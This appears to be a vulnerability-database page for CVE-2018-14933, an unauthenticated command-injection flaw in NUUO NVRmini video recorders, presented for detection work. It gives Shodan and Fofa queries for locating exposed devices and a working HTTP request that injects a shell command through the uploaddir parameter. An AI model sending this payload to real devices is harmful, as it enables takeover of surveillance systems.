🔙 목록으로 돌아가기

CVE-2018-14933: NUUO NVRmini - Remote Command Execution

TitleNUUO NVRmini - Remote Command Execution
Authorritikchaddha
SeverityCritical
ImpactUnauthenticated attackers can execute arbitrary commands on the NUUO NVRmini device by manipulating the uploaddir parameter in upgrade_handle.php, leading to complete device compromise and potential unauthorized access to video surveillance systems and recordings.
RemediationUpdate NUUO NVRmini to a patched version later than the 2016 firmware that properly validates the uploaddir parameter and restricts command execution.
CVSS Score9.8
EPSS Score0.93755
CVE IDCVE-2018-14933
CWE IDCWE-78
Shodan Querytitle:"NUUO"
Fofa Querytitle="NUUO"
Tags cve cve2018 nuuo rce kev vkev vuln

🔍 Vulnerability Description

NUUO NVRmini is vulnerable to unauthenticated remote command execution through the upgrade_handle.php file. The vulnerability allows an attacker to execute arbitrary commands by manipulating the uploaddir parameter.

🌐 HTTP Request

GET /upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;id;%27 HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-14933.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-14933.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A